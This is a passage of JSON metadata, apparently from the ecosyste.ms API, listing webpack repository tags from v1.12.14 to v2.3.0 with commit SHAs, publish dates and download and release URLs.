v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url"